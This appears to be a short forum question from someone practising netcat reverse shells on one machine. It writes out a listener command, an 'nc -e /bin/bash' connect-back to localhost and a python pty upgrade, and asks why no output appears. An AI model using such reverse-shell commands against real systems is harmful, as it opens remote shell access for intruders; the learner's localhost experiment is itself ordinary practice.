I tried doing nc shell on 2 terminals on the same machine, Term 1 has nc -lnvp 9090 and Term 2 has nc localhost 9090 -e /bin/bash. The listening shell works like nothing happened (just without a bash prompt) but the shell on term 2 doesn't seem to return anything when I use commands, even with somthing like python -c "import pty; pty.spawn('/bin/bash')". Am I doing something wrong or does it just not work on the same machine or something?
